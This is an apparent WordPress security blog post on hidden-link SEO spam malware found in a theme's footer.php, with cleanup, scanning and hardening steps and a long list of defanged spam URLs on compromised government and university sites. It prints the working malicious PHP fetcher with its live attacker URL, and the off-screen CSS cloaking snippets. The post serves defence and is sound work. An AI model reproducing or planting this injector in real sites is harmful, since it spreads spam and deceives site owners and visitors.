Category: WordPress Spam

Hidden links malware—also called link injection spam—silently inserts spammy backlinks and keywords into your WordPress site to pass authority to shady domains (pharma, casino, crypto, counterfeit, adult). It violates search guidelines, hurts rankings, risks manual penalties, and damages user trust.

In this real-world case, the attacker injected code into the theme’s footer.php. We’ll show you the exact pattern, how to spot it quickly, how to remove it safely, and how to harden your site so it doesn’t come back.

---

Key Takeaways

• What it is: SEO-spam that adds hidden links and spam keywords to fake authority (pharma, casino, crypto, counterfeit).
• How it hides: Remote fetch (loads spam HTML from an external server), direct hard-coded links, or off-screen CSS (e.g., position:absolute; left:-989999999999px;).
• Where it lives: Mostly footer.php, sometimes header.php and functions.php. This incident: found in footer.php.
• Why hundreds of links appear: A tiny “fetcher” prints a huge remote link list on every page.
• Clean fast: Backup → Maintenance → Remove fetchers & hard-coded blocks → Scan files + DB → Update everything → Rotate passwords + 2FA → Clear caches → Resubmit sitemap.
• Prevent: Keep WP/plugins/themes updated; minimal trusted plugins; disable PHP in /uploads/; correct file permissions; weekly website spam detection.

---

What Is SEO Spam Malware?

SEO spam malware (spamdexing) manipulates search engines by injecting hidden links, spam keywords, and junk pages. It’s a cloaking black-hat SEO tactic that can trigger Google manual actions and blacklist warnings.

Common spam niches: pharma spam keywords (erectile dysfunction, painkillers, weight loss pills), casino/betting, crypto/finance scams, counterfeit goods, and adult content.

---

Signs of Infection (Fast Checks)

• Search Console warnings: Security Issues or Manual Actions.
• Weird results for site:yourdomain.com: Japanese text, pharma/casino keywords, pages you didn’t create.
• View-source clues: large hidden blocks or off-screen CSS, e.g.:
  • display:none;, opacity:0;, visibility:hidden;, font-size:0;
  • position:absolute; left:-989999999999px; top:-999999px; (sometimes misspelled as position: absolution)
  • white text on white background; z-index:-1;; text-indent:-9999px;
• Admin/Server anomalies: unfamiliar admin users, odd files in /wp-content/, unexpected redirects, traffic spike from suspicious referrers.

---

Breaking Down the Code (How the Malware Works)

Remote-Fetch Injection (very common)

A small PHP snippet fetches HTML from an attacker-controlled server and prints it on your pages (often from footer.php):

<?php
$url = "https://nawalaku.my.id/bl/";

function fetch($url) {
if (ini_get('allow_url_fopen') && ($d = @file_get_contents($url))) return $d;

```
if (function_exists('curl_init')) {
    $c = curl_init($url);
    curl_setopt_array($c, [
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_USERAGENT => 'Mozilla/5.0',
        CURLOPT_TIMEOUT => 10
    ]);
    $d = curl_exec($c);
    curl_close($c);
    if ($d) return $d;
}

$ctx = stream_context_create([
    'http' => ['header' => "User-Agent: Mozilla/5.0\r\n", 'timeout' => 10]
]);
if ($d = @file_get_contents($url, false, $ctx)) return $d;

return '';
```

}

echo fetch($url); 

What it does: tries several HTTP methods, spoofs a browser UA, suppresses errors with @, and echoes whatever the remote server returns—usually a huge, hidden list of outbound links.

Direct Link Injection (no remote call)

Attackers paste spam links directly into templates, widgets, menus, or database content:

<div class="offscreen-links" style="position:absolute; left:-989999999999px; top:-999999px;">
  <a href="#">online casino</a>
  <a href="#">cheap pills</a>
</div>

Off-Screen CSS / Visual Cloaking

Instead of display:none, they push links far off-screen so users never notice but crawlers still see them:

<div style="position:absolute; left:-989999999999px; top:-999999px; width:1px; height:1px; overflow:hidden;">
  <a href="#">pharma discount</a>
</div>

Other patterns: text-indent:-9999px;, opacity:0;, visibility:hidden;, z-index:-1;, font-size:0;, color:white; background:white;, base64-encoded PHP payloads printed inside hidden blocks.

---

How to Clean It & Where to Find It

1. Backup your files and database first.
2. Maintenance mode so visitors don’t see spam during cleanup.
3. Remove malware code:
   • Start with /wp-content/themes/<your-active-theme>/footer.php (most common). In this case, the malicious fetcher was found in footer.php.
   • Then check header.php and functions.php (look for suspicious hooks like add_action('wp_footer', ...)).
   • Delete remote-fetch snippets, hard-coded link blocks, and off-screen CSS.
4. Scan files & DB:
   • Search code for file_get_contents, curl_init, base64_decode, gzinflate, eval, preg_replace('/e'.
   • DB tables to audit: wp_posts (spam posts/pages), wp_postmeta, wp_options (rogue settings), wp_users (unknown admins).
5. Update everything (WordPress core, themes, plugins). Remove unused/nulled software.
6. Rotate passwords & enable 2FA (WP, hosting, SFTP/SSH, DB, email). Force logout if needed.
7. Clear caches & resubmit your XML sitemap in Google Search Console; request review if a manual action exists.

Harden quickly (copy-paste):

Block PHP in uploads (Apache)

# /wp-content/uploads/.htaccess
<Files *.php>deny from all</Files>

Disable file editing in the WP dashboard

// wp-config.php
define('DISALLOW_FILE_EDIT', true);

---

Scan with Sucuri SiteCheck & Wordfence

Sucuri SiteCheck (sitecheck.sucuri.net)

1. Visit the SiteCheck page and enter your domain.
2. Review flagged scripts, spam URLs, and blacklist status.
3. Use the report as a checklist for manual cleanup.

 Wordfence plugin (firewall + malware scan)

1. Install Wordfence from Plugins → Add New.
2. Run a Full Scan (files + options).
3. Enable the Web Application Firewall and 2FA.
4. Turn on email alerts for file changes and brute-force attempts.

Alternatives: Solid Security (iThemes), Sucuri plugin, MalCare.

---

How to Prevent Reinfection (Practical WP Security)

• Keep everything updated (WordPress, plugins, themes, PHP version).
• Strong, unique passwords + 2FA for all admin accounts.
• Minimal, trusted plugins; never use nulled software.
• Disable PHP in /uploads/; set correct permissions (files 644, folders 755; wp-config.php can be 600).
• Add to wp-config.php: define('DISALLOW_FILE_EDIT', true);
• Limit login attempts, add CAPTCHA to public forms.
• Weekly website spam detection: quick source check + site:yourdomain.com search; monitor Search Console and server logs.
• Backups: daily off-site backups (files + DB); test restores monthly.

---

Common SEO-Spam URLs (Defanged, Non-Clickable)

Why defang? Using hxxps:// and [.] keeps links non-clickable and avoids passing link equity while still letting researchers (and search) match strings.

hxxps://nawalaku[.]my[.]id/bl/

hxxps://www[.]zeverix[.]com
hxxps://www[.]zeverix[.]com/google-core-update-bikin-website-susah-index-ini-penyebab-dan-cara-mengatasinya
hxxps://raw[.]zeverix[.]com/
hxxps://heylink[.]me/gopay-178/
hxxps://linktraffic[.]site/
hxxps://indobooster[.]com/
hxxps://gopay178[.]net/

hxxps://www[.]pa-pringsewu[.]go[.]id/news/
hxxps://sipp[.]pa-pringsewu[.]go[.]id/
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/pola-menang-mbak-retno-mahjong-ways2[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/pesilat-mojokerto-raih-78-juta-god-of-fortune-cq9[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/magic-lamp-spade-gaming-raih-190-juta-dalam-semalam[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/justice-league-playtech-fitur-hidden-combo-dan-mode-heroic-bonus[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/playboy-gold-microgaming-konsep-probabilitas-pemain-rasional[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/moon-princess-1000-playn-go-sistem-multiplier-dinamis[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/pekerja-bengkel-surabaya-menang-62-juta-hot-hot-fruit-habanero[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/mahasiswa-yogyakarta-berani-di-zeus-howling-thunder-cq9[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/tukang-ojek-jakarta-god-of-fortune-cq9-bayar-utang-pinjol[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/kunci-rahasia-magic-lamp-spade-gaming-menang-77-juta[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/analisis-ritme-liar-wild-safari-joker-gaming-dan-simbol-singa-emas[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/stop-pakai-headset-mahal-frekuensi-suara-cilok-keliling-ternyata-menguatkan-pola-scatter-di-slot-sweet-bonanza[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/bongkar-pola-jam-hoki-petani-kopi-gates-of-olympus-selalu-gacor-setelah-mereka-selesai-menjemur-biji-kopi-pertama[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/filosofi-gerakan-kipas-sate-taktik-atur-kecepatan-spin-turbo-slot-starlight-princess-agar-tidak-terdeteksi-algoritma[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/data-mengerikan-kenapa-rata-rata-rtp-wild-west-gold-naik-drastis-setiap-malam-minggu-setelah-maghrib[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/tukang-tambal-ban-curhat-teknik-mengukur-tekanan-udara-ban-sama-akuratnya-dengan-menghitung-jeda-spin-aztec-gems[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/real-madrid-vs-valencia-2-november-2025-03-00-wib-apakah-keajaiban-jude-bellingham-mampu-membongkar-pertahanan-besi-los-che-di-santiago-bernabeu[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/pembuktian-atau-pembantaian-manchester-city-vs-bournemouth-2-november-2025-23-30-wib-mengurai-pola-serangan-gila-pep-guardiola-yang-tak-terhentikan[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/jebakan-elche-di-tengah-pesta-barcelona-vs-elche-3-november-2025-xavi-wajib-waspada-terhadap-serangan-balik-maut-demi-jaga-posisi-puncak-klasemen[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/kunci-kemenangan-arsenal-vs-burnley-1-november-2025-22-00-wib-siapa-trio-maut-arteta-yang-paling-siap-jebol-tembok-pertahanan-berlapis-tim-promosi[.]html
hxxps://www[.]pa-pringsewu[.]go[.]id/berita/ujian-mental-paling-berat-manchester-united-vs-nottingham-forest-1-november-2025-22-00-wib-apakah-lini-belakang-setan-merah-mampu-keluar-dari-zona-krisis-jilid-dua[.]html

hxxps://saa[.]uinsgd[.]ac[.]id/
hxxps://saa[.]uinsgd[.]ac[.]id/berita/aksi-pedri-tak-cukup-barcelona-tumbang-lagi-di-tangan-los-blancos[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/villarreal-bangkit-gerard-moreno-cetak-brace-di-mestalla-valencia-tak-berkutik[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/celta-vigo-bikin-gila-publik-gol-menit-akhir-aspas-kunci-kemenangan-atas-osasuna[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/gol-aspas-di-menit-90-plus-2-jadi-simbol-semangat-celta-vigo-musim-ini[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/real-madrid-comeback-elegan-bellingham-tentukan-kemenangan-di-menit-akhir-el-clasico[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/drama-villa-park-ollie-watkins-jadi-mimpi-buruk-erling-haaland-city-pulang-tanpa-poin[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/tottenham-tanpa-ampun-richarlison-pesta-gol-everton-luluh-lantak-layaknya-scatter-beruntun[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/gabriel-jesus-selamatkan-arsenal-gol-tunggal-derby-london-kontra-palace[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/brentford-kejutkan-liverpool-wissa-dan-mbeumo-momentum-epik-slot-gacor[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/tottenham-nyalain-spin-turbo-richarlison-dan-son-heung-min-tembus-scatter-pertahanan-everton[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/analisis-data-akurat-mahjong-ways-3-pgsoft-pola-spin-cerdas-terbukti-jebol-jackpot[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/satpam-komplek-bongkar-pola-ngantuk-mahjong-ways-modal-kopi-pagi-pulang-bawa-jackpot-malam[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/ritual-kucing-hitam-menentukan-jam-hoki-scatter-hitam-di-mahjong-wins-3-terbukti-akurat-di-tanggal-muda[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/pengamat-jember-temukan-taktik-rahasia-memahami-rtp-dan-pola-tersembunyi-pemain-berpengalaman[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/panduan-tukang-parkir-mengatur-durasi-spin-turbo-dengan-logika-putaran-roda-motor-wild-jatuh-beruntun[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/saat-mesin-pep-guardiola-tak-pernah-padam-manchester-city-siap-hancurkan-bournemouth-di-etihad[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/arsenal-vs-burnley-malam-penentuan-trio-depan-arteta-di-tengah-tekanan-papan-atas[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/judi-bola-tottenham-vs-chelsea-london-jadi-medan-perang-dua-filosofi-sepak-bola-modern[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/derby-london-kontroversi-kartu-merah-chelsea-vs-tottenham-hotspur-2-november-2025-00-30-wib[.]html
hxxps://saa[.]uinsgd[.]ac[.]id/berita/trik-menang-orang-dalam-pragmatic-pahami-pola-rtp-agar-lebih-mudah-menang[.]html

hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/liverpool-kehilangan-fokus-darwin-nunez-cetak-tapi-pertahanan-kacau-diserang-brentford[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/gaya-tottenham-postecoglou-melejit-richarlison-jadi-tulang-punggung-spurs[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/aston-villa-tak-main-main-watkins-douglas-luiz-bikin-city-kehilangan-dominasi[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/manchester-united-temukan-ritme-rashford-dan-fernandes-tampil-mematikan[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/arsenal-tipis-tapi-pasti-arteta-pertahankan-momentum-gol-tunggal-jesus[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/arsenal-menang-tipis-pola-stabil-spin-manual-wild-beruntun-akhir-permainan[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/aston-villa-aktifkan-scatter-hitam-watkins-bikin-city-error-total-di-villa-park[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/brentford-patahkan-pola-liverpool-wissa-dan-mbeumo-jalankan-turbo-spin-cepat[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/manchester-united-mode-auto-spin-rashford-dan-fernandes-tembak-brighton-tanpa-napas[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/el-clasico-penuh-wild-bellingham-dan-vinicius-jr-pecahkan-pertahanan-barca[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/analisis-data-akurat-mahjong-ways-3-pgsoft-pola-spin-cerdas-terbukti-jebol-jackpot[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/satpam-komplek-bongkar-pola-ngantuk-mahjong-ways-modal-kopi-pagi-pulang-bawa-jackpot-malam[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/ritual-kucing-hitam-menentukan-jam-hoki-scatter-hitam-di-mahjong-wins-3-terbukti-akurat-di-tanggal-muda[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/pengamat-jember-temukan-taktik-rahasia-memahami-rtp-dan-pola-tersembunyi-pemain-berpengalaman[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/panduan-tukang-parkir-mengatur-durasi-spin-turbo-dengan-logika-putaran-roda-motor-wild-jatuh-beruntun[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/sistem-xavi-anti-kebobolan-barcelona-vs-elche-3-november-2025-statistik-clean-sheet-barca-naik-drastis-setelah-masuknya-gavi[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/derby-london-kontroversi-kartu-merah-chelsea-vs-tottenham-hotspur-2-november-2025-00-30-wib[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/judi-bola-tottenham-vs-chelsea-london-jadi-medan-perang-dua-filosofi-sepak-bola-modern[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/prediksi-liverpool-vs-aston-villa-2-november-2025-ujian-kecerdikan-klopp-dalam-duel-dini-hari[.]html
hxxps://ejournal[.]stipjakarta[.]ac[.]id/public/esukasi/sistem-xavi-anti-kebobolan-barcelona-vs-elche-3-november-2025-statistik-clean-sheet-barca-naik-drastis[.]html

hxxps://itb-ru[.]ac[.]id/kabar/taruhan-bola-bellingham-el-clasico-persiapan-madrid[.]html
hxxps://itb-ru[.]ac[.]id/kabar/bola-online-rashford-ultimatum-mu-vs-brighton-ten-hag[.]html
hxxps://itb-ru[.]ac[.]id/kabar/judi-bola-haaland-latihan-ekstra-man-city-vs-aston-villa[.]html
hxxps://itb-ru[.]ac[.]id/kabar/andi-mekanik-pola-maxwin-mahjong-ways2-wild-deret[.]html
hxxps://itb-ru[.]ac[.]id/kabar/bu-wati-timing-scatter-pgsoft[.]html
hxxps://itb-ru[.]ac[.]id/kabar/rahasia-spin-turbo-mahjong-ways-stabil-hold-on-win[.]html
hxxps://itb-ru[.]ac[.]id/kabar/roni-montir-buy-scatter-6x-delay-15-wede-99juta[.]html
hxxps://itb-ru[.]ac[.]id/kabar/wild-flux-tengah-malam-modal-20rb-jadi-93juta[.]html
hxxps://itb-ru[.]ac[.]id/kabar/pola-campuran-starlight-princess-scatter-muncul-sendiri[.]html
hxxps://itb-ru[.]ac[.]id/kabar/trik-psikologis-rtp-spin-pintar-profit-harian[.]html

hxxps://itb-ru[.]ac[.]id/berita/madrid-menang-barcelona-goyang-xavi-cari-formula-baru-setelah-kekalahan-el-clasico[.]html
hxxps://itb-ru[.]ac[.]id/berita/haaland-macet-total-di-villa-park-guardiola-akui-masalah-di-lini-depan[.]html
hxxps://itb-ru[.]ac[.]id/berita/richarlison-cetak-gol-spesial-di-goodison-park-tottenham-puncaki-momentum-liga[.]html
hxxps://itb-ru[.]ac[.]id/berita/vinicius-jr-selebrasi-kontroversial-warnai-kemenangan-madrid-atas-barca[.]html
hxxps://itb-ru[.]ac[.]id/berita/liverpool-rapuh-tanpa-salah-brentford-buktikan-kerapuhan-lini-belakang-the-reds[.]html
hxxps://itb-ru[.]ac[.]id/berita/celta-vigo-comeback-edan-aspas-dapat-pola-scatter-tanpa-henti-osasuna-kalah-di-menit-akhir[.]html
hxxps://itb-ru[.]ac[.]id/berita/gerard-moreno-nyalain-turbo-mode-villarreal-tekan-valencia-kayak-dapat-wild-tiap-spin[.]html
hxxps://itb-ru[.]ac[.]id/berita/tottenham-tampil-disiplin-richarlison-jalankan-pola-spin-presisi-everton-tak-temukan-irama[.]html
hxxps://itb-ru[.]ac[.]id/berita/arsenal-efisien-gol-tunggal-jesus-tentukan-hasil-pertandingan[.]html
hxxps://itb-ru[.]ac[.]id/berita/aston-villa-strategi-wild-tersembunyi-watkins-dan-emery-menang-atas-manchester-city[.]html

hxxps://itb-ru[.]ac[.]id/news/stop-boros-kuota-mode-hemat-data-ponsel-optimalkan-pola-scatter-mahjong-ways-hingga-99[.]html
hxxps://itb-ru[.]ac[.]id/news/filosofi-ngopi-hitam-ala-pemain-pro-rahasia-rtp-slot-pragmatic-selalu-di-puncak[.]html
hxxps://itb-ru[.]ac[.]id/news/tukang-ojek-online-bongkar-pola-spin-manual-nunggu-orderan-jackpot-otomatis[.]html
hxxps://itb-ru[.]ac[.]id/news/data-tersembunyi-server-pola-scatter-koi-gate-aktif-setelah-jam-3-dini-hari[.]html
hxxps://itb-ru[.]ac[.]id/news/taktik-mengubah-kebiasaan-mencuci-piring-jadi-pola-spin-cerdas-pgsoft[.]html
hxxps://itb-ru[.]ac[.]id/news/misteri-di-anfield-liverpool-vs-aston-villa-2-november-2025-03-00-wib[.]html
hxxps://itb-ru[.]ac[.]id/news/hanya-22-menit-arsenal-vs-burnley-1-november-2025-22-00-wib[.]html
hxxps://itb-ru[.]ac[.]id/news/siapa-pelatih-paling-tertekan-man-united-vs-nottingham-forest-1-november-2025-22-00-wib[.]html
hxxps://itb-ru[.]ac[.]id/news/ketergantungan-berbahaya-real-madrid-vs-valencia-2-november-2025-03-00-wib[.]html
hxxps://itb-ru[.]ac[.]id/news/judi-bola-tottenham-vs-chelsea-london-medan-perang-filosofi-modern[.]html

hxxps://stiabiru[.]ac[.]id/edukasi/celta-vigo-tegas-banget-osasuna-sempat-unggul-tapi-aspas-balikkan-keadaan[.]html
hxxps://stiabiru[.]ac[.]id/edukasi/villarreal-menang-taktis-gerard-moreno-kembali-tajam-setelah-cedera-panjang[.]html
hxxps://stiabiru[.]ac[.]id/edukasi/mu-menari-di-old-trafford-gol-indah-rashford-hiasi-malam-manis-setan-merah[.]html
hxxps://stiabiru[.]ac[.]id/edukasi/ancelotti-senyum-lebar-madrid-kalahkan-barca-dengan-kelas-mental-juara-terjaga[.]html
hxxps://stiabiru[.]ac[.]id/edukasi/premier-league-mendidih-aston-villa-brentford-tottenham-pencuri-sorotan-pekan-ini[.]html
hxxps://stiabiru[.]ac[.]id/edukasi/brentford-dan-liverpool-pertandingan-penuh-tekanan-wild-card-penentu-kemenangan[.]html
hxxps://stiabiru[.]ac[.]id/edukasi/manchester-united-bangkit-pola-serangan-terstruktur-rashford-dan-fernandes-mematikan[.]html
hxxps://stiabiru[.]ac[.]id/edukasi/el-clasico-di-bernabeu-real-madrid-tunjukkan-stabilitas-mental-bellingham-pola-konsisten[.]html
hxxps://stiabiru[.]ac[.]id/edukasi/celta-vigo-tekanan-akhir-scatter-momentum-gol-aspas-menit-akhir-bukti-ketekunan[.]html
hxxps://stiabiru[.]ac[.]id/edukasi/villarreal-menang-taktis-di-mestalla-gerard-moreno-pola-seimbang-spin-terukur[.]html

hxxps://diskominfo[.]pegbintangkab[.]go[.]id/news/kenapa-the-dog-house-megaways-pragmatic-play-viral-lagi-kisah-ibu-rumah-tangga-di-bekasi-mengguncang-rtp[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/news/psikologi-warna-di-candy-bonanza-pg-soft-benarkah-kombinasi-merah-dan-kuning-pemicu-cluster-win-terbesar[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/news/mitos-vs-fakta-justice-league-playtech-karyawan-it-bandung-bukukan-kemenangan-122-5-juta-di-tengah-jam-kerja[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/news/trik-skip-intro-di-playboy-gold-microgaming-pegawai-bank-medan-raih-88-juta-saat-server-ganti-jam[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/news/moon-princess-1000-cetak-sejarah-baru-mahasiswa-surabaya-tembus-95-juta-berkat-ritual-ganti-jaringan-4g[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/news/pola-triple-hot-hot-hot-fruit-habanero-eksperimen-penjaga-warung-bogor-berakhir-112-juta-tanpa-turbo-mode[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/news/apakah-zeus-howling-thunder-cq9-punya-jam-terlarang-pengakuan-streamer-tentang-waktu-delay-terbaik[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/news/5-pola-efisien-bermain-wild-safari-joker-gaming-agar-spin-tetap-konsisten-tanpa-over-budget[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/news/the-dog-house-megaways-pragmatic-play-strategi-ritme-pola-spin-dan-momentum-waktu-tepat-bikin-wild-jatuh-beruntun[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/news/candy-bonanza-pg-soft-sembunyikan-mekanik-rahasia-analisis-pola-scatter-yang-bisa-diatur-dengan-timing[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/edukasi/perang-taktik-di-dini-hari-liverpool-vs-aston-villa-2-november-2025-03-00-wib[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/edukasi/derby-london-berdarah-chelsea-vs-tottenham-hotspur-2-november-2025-00-30-wib[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/edukasi/atletico-madrid-vs-sevilla-1-november-2025-22-15-wib-taktik-diego-simeone[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/edukasi/manchester-city-vs-bournemouth-2-november-2025-23-30-wib-expected-goals-haaland[.]html
hxxps://diskominfo[.]pegbintangkab[.]go[.]id/edukasi/atletico-madrid-vs-sevilla-1-november-2025-22-15-wib-analisis-15-menit-akhir[.]html

hxxps://bodojournal[.]org/

---

FAQs

Q1: Does malware always fetch links from another server?
A: No. Many infections are hard-coded in theme files or the database, and others use off-screen CSS to hide links (e.g., position:absolute; left:-989999999999px;).

Q2: Where should I check first in WordPress?
A: footer.php is the most common, then header.php and functions.php. Also review widgets, menus, and wp_options. In this case, the malicious code was found in footer.php.

Q3: Why do hundreds of links appear at once?
A: A tiny “fetcher” echoes a large, remote link list on every page. One snippet multiplies into hundreds of hidden backlinks.

Q4: Will my rankings recover after cleanup?
A: Usually, yes—if you clean thoroughly, patch the entry point, update everything, and request review in Search Console. Keep publishing helpful content and monitor your site.

Q5: Is display:none the only trick?
A: No. Look for off-screen CSS like position:absolute; left:-989999999999px;, text-indent:-9999px;, opacity:0, visibility:hidden, z-index:-1, font-size:0, and color-matching text (white on white).

---

Conclusion

Hidden links malware is sneaky but fixable. It may fetch spam HTML remotely, hard-code links, or hide them off-screen so humans never notice—but search engines do. On WordPress, start at footer.php, then header.php and functions.php. In our case, the injector was in footer.php.

Clean thoroughly, update everything, rotate passwords and enable 2FA, resubmit your sitemap, and keep weekly website spam detection checks. This is the fastest path to SEO recovery and long-term protection.

Need help fast? I remove hidden links malware and SEO spam from WordPress—safely and quickly. Hire me →